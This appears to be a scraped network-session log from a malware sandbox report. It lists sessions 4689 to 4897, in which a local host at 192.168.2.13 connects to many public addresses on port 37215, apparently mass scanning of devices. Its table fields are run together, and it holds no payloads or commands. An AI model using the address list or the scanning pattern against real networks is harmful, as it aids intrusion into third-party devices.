                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4689192.168.2.1345232147.158.29.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4690192.168.2.1359070157.209.227.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4691192.168.2.1345484157.199.124.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4692192.168.2.1337726197.123.58.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4693192.168.2.1353158197.12.137.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4694192.168.2.135272441.184.248.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4695192.168.2.1354194197.227.180.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4696192.168.2.135660241.228.83.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4697192.168.2.134694041.83.45.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4698192.168.2.134822238.96.148.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4699192.168.2.1340700157.139.180.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4700192.168.2.1341784101.198.219.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4701192.168.2.13448649.31.60.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4702192.168.2.134527241.237.56.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4703192.168.2.134426267.96.157.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4704192.168.2.1346196163.108.203.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4705192.168.2.135577841.242.197.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4706192.168.2.1341698197.252.67.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4707192.168.2.1355824197.165.252.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4708192.168.2.133320841.77.49.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4709192.168.2.135323041.244.121.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4710192.168.2.1335524197.54.249.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4711192.168.2.135376641.146.39.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4712192.168.2.133836041.140.69.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4713192.168.2.1342528197.193.222.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4714192.168.2.1336898197.108.68.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4715192.168.2.1339826184.161.148.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4716192.168.2.1349578157.241.99.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4717192.168.2.1332960157.181.74.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4718192.168.2.1350748141.124.115.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4719192.168.2.1338244157.226.152.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4720192.168.2.1352424157.22.86.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4721192.168.2.135314053.83.42.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4722192.168.2.135184453.81.70.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4723192.168.2.1343676157.255.6.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4724192.168.2.1353146157.244.179.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4725192.168.2.1336636157.38.99.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4726192.168.2.1333550157.111.230.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4727192.168.2.1349382197.234.41.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4728192.168.2.1352066197.75.220.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4729192.168.2.1341690157.53.6.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4730192.168.2.1333560197.90.238.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4731192.168.2.133960841.16.62.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4732192.168.2.1350298197.164.244.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4733192.168.2.1335802108.54.8.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4734192.168.2.1348672197.123.11.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4735192.168.2.133922641.250.223.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4736192.168.2.1358326197.206.153.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4737192.168.2.134871841.100.226.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4738192.168.2.1353712149.177.175.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4739192.168.2.1335914197.34.137.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4740192.168.2.135500041.200.146.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4741192.168.2.1338278197.48.43.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4742192.168.2.134539041.4.80.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4743192.168.2.1335270157.119.19.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4744192.168.2.1347380197.30.65.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4745192.168.2.1354070197.200.4.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4746192.168.2.1355674197.9.100.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4747192.168.2.1333988157.141.76.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4748192.168.2.1344908152.52.1.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4749192.168.2.135115859.221.70.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4750192.168.2.1356554159.199.59.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4751192.168.2.1335024197.236.191.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4752192.168.2.133579617.64.181.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4753192.168.2.134762641.255.227.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4754192.168.2.134968441.7.78.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4755192.168.2.1353646157.201.185.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4756192.168.2.1347024157.88.202.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4757192.168.2.1352856217.176.193.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4758192.168.2.135225641.140.154.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4759192.168.2.133688697.148.253.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4760192.168.2.135525441.180.27.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4761192.168.2.1334250170.198.224.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4762192.168.2.1341016197.7.53.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4763192.168.2.133386041.237.5.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4764192.168.2.134764651.86.161.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4765192.168.2.1358442197.240.29.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4766192.168.2.1342724157.91.150.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4767192.168.2.1343162197.69.21.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4768192.168.2.1359828117.192.216.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4769192.168.2.135773641.19.176.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4770192.168.2.1342686178.79.131.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4771192.168.2.1360132197.206.6.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4772192.168.2.1345672139.157.14.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4773192.168.2.1353538157.163.30.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4774192.168.2.1348730197.140.207.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4775192.168.2.133556641.119.238.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4776192.168.2.1344226197.154.161.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4777192.168.2.1337336197.113.89.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4778192.168.2.1356888157.56.178.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4779192.168.2.1350542157.187.233.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4780192.168.2.1354060157.213.131.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4781192.168.2.1338672157.50.16.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4782192.168.2.1347310157.195.181.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4783192.168.2.135613041.200.161.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4784192.168.2.1355958197.162.186.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4785192.168.2.1347440197.246.226.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4786192.168.2.134121089.99.6.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4787192.168.2.1333254157.176.238.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4788192.168.2.1355520197.21.127.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4789192.168.2.135969641.70.241.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4790192.168.2.1334380197.44.135.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4791192.168.2.1359136208.75.73.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4792192.168.2.134881841.204.242.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4793192.168.2.1339498197.251.107.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4794192.168.2.1344848197.195.125.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4795192.168.2.1349670108.124.217.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4796192.168.2.1340430157.111.197.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4797192.168.2.1360756157.228.29.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4798192.168.2.134097681.35.137.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4799192.168.2.134922041.208.157.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4800192.168.2.1355688157.221.98.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4801192.168.2.134135668.190.6.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4802192.168.2.135780641.92.162.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4803192.168.2.1347418197.68.12.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4804192.168.2.1354460197.34.28.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4805192.168.2.134629879.187.179.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4806192.168.2.1352736197.163.132.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4807192.168.2.1356344143.85.148.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4808192.168.2.1354540197.222.42.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4809192.168.2.1338822157.54.132.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4810192.168.2.133793441.199.94.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4811192.168.2.134911645.183.102.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4812192.168.2.1335070197.235.13.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4813192.168.2.133835641.101.134.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4814192.168.2.135244841.31.48.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4815192.168.2.1356698157.157.162.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4816192.168.2.1356330197.175.115.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4817192.168.2.134878441.47.222.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4818192.168.2.134280641.199.32.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4819192.168.2.1342312197.225.188.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4820192.168.2.133486019.36.174.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4821192.168.2.1342076166.51.219.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4822192.168.2.1350016157.79.200.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4823192.168.2.136004441.242.130.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4824192.168.2.1342106157.158.209.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4825192.168.2.1336592157.21.71.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4826192.168.2.135591441.190.217.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4827192.168.2.135643241.187.1.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4828192.168.2.1349646157.237.203.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4829192.168.2.133471641.13.85.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4830192.168.2.1337448197.37.193.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4831192.168.2.134177441.60.211.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4832192.168.2.133852025.193.133.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4833192.168.2.135962041.155.216.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4834192.168.2.1339642157.168.116.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4835192.168.2.1358260157.182.6.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4836192.168.2.1356746197.220.172.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4837192.168.2.1340598197.163.4.537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4838192.168.2.1346338157.6.201.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4839192.168.2.1360762210.85.134.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4840192.168.2.1351930197.163.118.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4841192.168.2.1356668114.226.246.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4842192.168.2.1333014200.54.148.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4843192.168.2.134369641.131.137.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4844192.168.2.1353246197.16.157.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4845192.168.2.133687081.4.148.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4846192.168.2.135079241.91.205.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4847192.168.2.135376241.228.52.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4848192.168.2.134953277.150.15.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4849192.168.2.1348300159.134.193.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4850192.168.2.1356444157.210.185.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4851192.168.2.135624641.39.126.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4852192.168.2.1341442197.68.149.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4853192.168.2.1339956197.210.146.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4854192.168.2.13468161.73.32.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4855192.168.2.1352982197.134.214.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4856192.168.2.1350394157.33.4.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4857192.168.2.1345092197.46.201.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4858192.168.2.1333304157.92.84.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4859192.168.2.1351264157.163.192.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4860192.168.2.134808064.249.173.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4861192.168.2.1351502197.59.243.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4862192.168.2.1360564157.104.6.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4863192.168.2.135387441.78.145.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4864192.168.2.1343822157.239.40.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4865192.168.2.1340482205.140.15.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4866192.168.2.1352160197.236.153.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4867192.168.2.135357841.157.233.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4868192.168.2.135001441.19.243.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4869192.168.2.1350566157.178.0.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4870192.168.2.1355282157.215.56.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4871192.168.2.1334348157.78.236.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4872192.168.2.133405041.102.56.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4873192.168.2.1338802157.15.151.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4874192.168.2.1360642158.131.251.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4875192.168.2.134289443.239.168.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4876192.168.2.1336320197.253.247.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4877192.168.2.1357458218.92.33.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4878192.168.2.1350668173.75.110.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4879192.168.2.1342314197.244.241.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4880192.168.2.1338392157.182.64.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4881192.168.2.1350792188.63.137.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4882192.168.2.135693041.129.107.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4883192.168.2.134447841.13.243.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4884192.168.2.134043698.244.223.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4885192.168.2.133818841.196.200.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4886192.168.2.1357414197.163.68.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4887192.168.2.1333196157.142.166.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4888192.168.2.1355794132.229.137.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4889192.168.2.1333706125.132.165.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4890192.168.2.1351522197.92.77.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4891192.168.2.1358474157.144.206.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4892192.168.2.133992441.121.229.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4893192.168.2.1343192157.206.41.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4894192.168.2.134956447.159.1.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4895192.168.2.1336948106.30.248.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4896192.168.2.1347814157.237.100.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4897192.168.2.1346946148.199.112.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
